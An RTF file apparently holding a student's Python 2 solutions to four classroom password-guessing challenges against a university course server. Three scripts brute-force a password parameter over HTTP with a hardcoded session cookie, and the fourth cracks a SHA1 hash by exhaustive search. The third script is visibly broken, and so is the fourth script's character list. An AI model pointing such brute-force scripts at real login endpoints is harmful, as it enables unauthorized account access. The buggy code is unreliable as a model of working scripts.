{\rtf1\ansi\ansicpg1252\cocoartf1671\cocoasubrtf600
{\fonttbl\f0\fswiss\fcharset0 Helvetica-Bold;\f1\fswiss\fcharset0 Helvetica;}
{\colortbl;\red255\green255\blue255;}
{\*\expandedcolortbl;;}
\margl1440\margr1440\vieww10800\viewh8400\viewkind0
\pard\tx720\tx1440\tx2160\tx2880\tx3600\tx4320\tx5040\tx5760\tx6480\tx7200\tx7920\tx8640\pardirnatural\partightenfactor0

\f0\b\fs24 \cf0 \ul \ulc0 Challenge 1:\

\f1\b0 \ulnone import urllib2 # A relatively easy to use HTTP library\
\
#The server we want to attack (don't forget the port number if needs be!)\
server = "http://cpe123.csc.calpoly.edu:443"\
#You must login "manually" at least once to get your webpy_session token. Copy and paste it here:\
token = "b25350ce985d2988de3f457f96196b923563f37e"\
\
\
#For the numbers _ through _\
for guess in range(1000):\
	#Create an HTTP request to level0 of the server using 'guess' as a password guess\
	req = urllib2.Request(server + "/level1?guess=" + str(guess))\
	#Add the session cookie to the header\
	req.add_header('Cookie', 'webpy_session_id=' + token)\
	#Try to make the connection, if there an error (it doesn't return the HTTP 200 status code), catch it and print the error code\
	try:\
		response = urllib2.urlopen(req)\
        #If we're here, then we probably got the right answer!\
		print guess, response.getcode()\
    	except urllib2.HTTPError as e:\
        #If we're here, then we got a 400-level HTTP response code from the server, and our guess was wrong\
			print guess, e.code\
	else:\
		quit()\
\
\

\f0\b \ul Challenge 2: \

\f1\b0 \ulnone import urllib2 \
\
server = "http://cpe123.csc.calpoly.edu:443"\
token = "b25350ce985d2988de3f457f96196b923563f37e"\
\
f = open("words.txt")\
content = f.readlines()\
\
for guess in content:\
	req = urllib2.Request(server + "/level2?guess=" + guess)\
	req.add_header('Cookie', 'webpy_session_id=' + token)\
	if len(guess) >= 9:\
		try:\
			response = urllib2.urlopen(req)\
			print guess, response.getcode()\
		except urllib2.HTTPError as e:\
			print guess, e.code\
		else:\
			quit()\
	else:\
		continue\
\
\

\f0\b \ul Challenge 3:\

\f1\b0 \ulnone import urllib2 \
\
server = "http://cpe123.csc.calpoly.edu:443"\
token = "b25350ce985d2988de3f457f96196b923563f37e"\
    \
alphabet = ["A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9"]\
\
\
for first_character in alphabet:\
    for second_character in alphabet:\
        for third_character in alphabet:\
            for fourth_character in alphabet:\
                try:\
                    req = urllib2.Request(server + "/level3?guess=" + guess)\
	                req.add_header('Cookie', 'webpy_session_id=' + token)\
                    response = urllib2.urlopen(req)\
                    password = first_character + second_character + third_character + fourth_character \
                    print password, response.getcode()\
                except urllib2.HTTPError as e:\
                                print password, e.code\
            else:\
                quit()\
\
\

\f0\b \ul Challenge 4:\

\f1\b0 \ulnone import hashlib\
\
alphabet = ["A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "0" "1", "2", "3", "4", "5", "6", "7", "8", "9"]\
\
for first_character in alphabet:\
    for second_character in alphabet:\
        for third_character in alphabet:\
            for fourth_character in alphabet:\
                for fifth_character in alphabet:\
                    for sixth_character in alphabet:\
                        password = first_character + second_character + third_character + fourth_character + fifth_character + sixth_character\
                        digest = hashlib.sha1(password).hexdigest()\
                        if digest == "0ea16802578986ac3428d2eb649a6a089d2c4552":\
                            print password\
                            quit()\
                        else:\
                            print password\
\ul \
\
\ulnone \
\
\ul \

\f0\b \
\
\
}